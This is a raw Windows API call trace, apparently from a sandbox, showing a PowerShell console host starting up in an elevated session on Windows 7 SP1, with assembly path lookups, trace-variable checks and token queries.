	[0597.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0597.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0599.581] CoTaskMemAlloc (cb=0x104) returned 0x139b50
	[0599.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0599.581] CoTaskMemFree (pv=0x139b50) 
	[0599.582] CoTaskMemAlloc (cb=0x104) returned 0x139b50
	[0599.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0599.582] CoTaskMemFree (pv=0x139b50) 
	[0601.051] CoTaskMemAlloc (cb=0x104) returned 0x139b50
	[0601.051] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0601.051] CoTaskMemFree (pv=0x139b50) 
	[0601.053] CoTaskMemAlloc (cb=0x104) returned 0x139b50
	[0601.053] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0601.053] CoTaskMemFree (pv=0x139b50) 
	[0601.053] CoTaskMemAlloc (cb=0x104) returned 0x139b50
	[0601.053] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0601.053] CoTaskMemFree (pv=0x139b50) 
	[0605.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0605.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0606.055] CoTaskMemAlloc (cb=0x104) returned 0x139b50
	[0606.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.056] CoTaskMemFree (pv=0x139b50) 
	[0606.057] CoTaskMemAlloc (cb=0x104) returned 0x139b50
	[0606.057] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.057] CoTaskMemFree (pv=0x139b50) 
	[0606.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0606.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0611.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0616.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0616.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0617.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0617.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0618.894] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0618.894] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.894] CoTaskMemFree (pv=0x139d70) 
	[0618.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0618.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0618.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0618.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0620.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x26d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0620.804] SetErrorMode (uMode=0x1) returned 0x1
	[0620.804] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x26d800 | out: lpFileInformation=0x26d800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0620.804] SetErrorMode (uMode=0x1) returned 0x1
	[0624.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0624.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0624.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0624.819] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0624.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.819] CoTaskMemFree (pv=0x139d70) 
	[0624.822] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0624.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.822] CoTaskMemFree (pv=0x139d70) 
	[0624.823] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0624.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.823] CoTaskMemFree (pv=0x139d70) 
	[0624.825] CoCreateGuid (in: pguid=0x26dbc8 | out: pguid=0x26dbc8*(Data1=0x217709e5, Data2=0xf8b2, Data3=0x455f, Data4=([0]=0x86, [1]=0xcb, [2]=0xf7, [3]=0x5b, [4]=0x7, [5]=0xb0, [6]=0x30, [7]=0x55))) returned 0x0
	[0624.829] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0624.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.829] CoTaskMemFree (pv=0x139d70) 
	[0624.832] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0624.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.832] CoTaskMemFree (pv=0x139d70) 
	[0624.834] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0624.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.834] CoTaskMemFree (pv=0x139d70) 
	[0624.845] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0624.847] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x26d870 | out: lpConsoleScreenBufferInfo=0x26d870) returned 1
	[0624.857] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0625.501] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x26d870 | out: lpConsoleScreenBufferInfo=0x26d870) returned 1
	[0625.502] GetVersionExW (in: lpVersionInformation=0x26d800*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d800*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0625.504] GetCurrentProcess () returned 0xffffffffffffffff
	[0625.505] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x26d898 | out: TokenHandle=0x26d898*=0x328) returned 1
	[0625.510] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26d7b8 | out: TokenInformation=0x0, ReturnLength=0x26d7b8) returned 0
	[0625.511] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xb7310
	[0625.511] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x8, TokenInformation=0xb7310, TokenInformationLength=0x4, ReturnLength=0x26d7b8 | out: TokenInformation=0xb7310, ReturnLength=0x26d7b8) returned 1
	[0625.512] DuplicateTokenEx (in: hExistingToken=0x328, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x26d918 | out: phNewToken=0x26d918*=0x2e8) returned 1
	[0625.512] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26d7b8 | out: TokenInformation=0x0, ReturnLength=0x26d7b8) returned 0
	[0625.512] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xb7340
	[0625.513] GetTokenInformation (in: TokenHandle=0x328, TokenInformationClass=0x8, TokenInformation=0xb7340, TokenInformationLength=0x4, ReturnLength=0x26d7b8 | out: TokenInformation=0xb7340, ReturnLength=0x26d7b8) returned 1
	[0625.513] CheckTokenMembership (in: TokenHandle=0x2e8, SidToCheck=0x2e61758*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x26d928 | out: IsMember=0x26d928) returned 1
	[0625.514] CloseHandle (hObject=0x2e8) returned 1
	[0625.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.692] CoTaskMemAlloc (cb=0x804) returned 0x1b871c80
	[0625.693] GetConsoleTitleW (in: lpConsoleTitle=0x1b871c80, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0625.693] CoTaskMemFree (pv=0x1b871c80) 
	[0625.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0626.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0626.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0626.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0628.227] CoTaskMemAlloc (cb=0x104) returned 0x139d70
